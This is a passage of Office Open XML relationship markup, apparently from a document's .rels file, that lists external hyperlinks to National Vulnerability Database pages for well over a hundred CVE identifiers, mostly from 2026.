Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88952" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91039" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92860" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45143" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47252" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77903" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88795" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92952" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14850" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15815" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25283" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28326" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54239" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54504" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54519" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54612" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54671" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54916" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77614" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78295" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85130" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86801" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87786" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88792" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88904" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92918" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92970" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92972" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52836" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54343" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54571" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63459" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69197" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77615" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86864" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89036" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89418" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92971" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92987" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19477" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68791" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87963" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92914" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92954" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92985" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92986" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66580" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71538" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92958" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93292" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93426" TargetMode="External" Id="rId110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54507" TargetMode="External" Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55062" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54580" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54581" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54583" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54597" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54253" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54354" TargetMode="External" Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54451" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56795" TargetMode="External" Id="rId120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82760" TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85077" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86039" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92903" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-26950" TargetMode="External" Id="rId125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54446" TargetMode="External" Id="rId126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54520" TargetMode="External" Id="rId127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54596" TargetMode="External" Id="rId128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76834" TargetMode="External" Id="rId129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81442" TargetMode="External" Id="rId130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81475" TargetMode="External" Id="rId131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81476" TargetMode="External" Id="rId132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81478" TargetMode="External" Id="rId133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87935" TargetMode="External" Id="rId134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92984" TargetMode="External" Id="rId135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78428" TargetMode="External" Id="rId136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25282" TargetMode="External" Id="rId137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-59607" TargetMode="External" Id="rId138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-24073" TargetMode="External" Id="rId139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-24074" TargetMode="External" Id="rId140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-24075" TargetMode="External" Id="rId141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25278" TargetMode="External" Id="rId142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25280" TargetMode="External" Id="rId143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25290" TargetMode="External" Id="rId144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54692" TargetMode="External" Id="rId145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81474" TargetMode="External" Id="rId146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86320" TargetMode="External" Id="rId147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92838" TargetMode="External" Id="rId148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93337" TargetMode="External" Id="rId149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48977" TargetMode="External" Id="rId150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50158" TargetMode="External" Id="rId151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53557" TargetMode="External" Id="rId152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54339" TargetMode="External" Id="rId153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81546" TargetMode="External" Id="rId154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45726" TargetMode="External" Id="rId155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54506" TargetMode="External" Id="rId156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66618" TargetMode="External" Id="rId157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66619" TargetMode="External" Id="rId158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66624" TargetMode="External" Id="rId159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66625" TargetMode="External" Id="rId160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66626" TargetMode="External" Id="rId161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66628" TargetMode="External" Id="rId162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66630" TargetMode="External" Id="rId163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66631" TargetMode="External" Id="rId164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78425" TargetMode="External" Id="rId165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80218" TargetMode="External" Id="rId166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82685" TargetMode="External" Id="rId167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25275" TargetMode="External" Id="rId168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50125" TargetMode="External" Id="rId169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50275" TargetMode="External" Id="rId170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50277" TargetMode="External" Id="rId171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50285" TargetMode="External" Id="rId172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53534" TargetMode="External" Id="rId173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54716" TargetMode="External" Id="rId174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63460" TargetMode="External" Id="rId175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68523" TargetMode="External" Id="rId176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68537" TargetMode="External" Id="rId177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81481" TargetMode="External" Id="rId178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81515" TargetMode="External" Id="rId179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81516" TargetMode="External" Id="rId180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85128" TargetMode="External" Id="rId181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85715" TargetMode="External" Id="rId182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85719" TargetMode="External" Id="rId183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85721" TargetMode="External" Id="rId184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85917" TargetMode="External" Id="rId185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86038" TargetMode="External" Id="rId186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86040" TargetMode="External" Id="rId187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87742" TargetMode="External" Id="rId188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92916" TargetMode="External" Id="rId189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92917" TargetMode="External" Id="rId190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92942" TargetMode="External" Id="rId191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92961" TargetMode="External" Id="rId192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92983" TargetMode="External" Id="rId193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93435" TargetMode="External" Id="rId194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93436" TargetMode="External" Id="rId195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-24081" TargetMode="External" Id="rId196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25281" TargetMode="External" Id="rId197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25294" TargetMode="External" Id="rId198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50605" TargetMode="External" Id="rId199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50609" TargetMode="External" Id="rId200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50610" TargetMode="External" Id="rId201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78501" TargetMode="External" Id="rId202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81446" TargetMode="External" Id="rId203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86688" TargetMode="External" Id="rId204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90997" TargetMode="External" Id="rId205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92913" TargetMode="External" Id="rId206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25284" TargetMode="External" Id="rId207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53554" TargetMode="External" Id="rId208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54634" TargetMode="External" Id="rId209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66269" TargetMode="External" Id="rId210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76154" TargetMode="External" Id="rId211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80356" TargetMode="External" Id="rId212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81440" TargetMode="External" Id="rId213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52727" TargetMode="External" Id="rId214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54646" TargetMode="External" Id="rId215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54647" TargetMode="External" Id="rId216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81445" TargetMode="External" Id="rId217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81477" TargetMode="External" Id="rId218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81480" TargetMode="External" Id="rId219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81632" TargetMode="External" Id="rId220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92919" TargetMode="External" Id="rId221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92980" TargetMode="External" Id="rId222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-15697" TargetMode="External" Id="rId223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44236" TargetMode="External" Id="rId224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52851" TargetMode="External" Id="rId225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 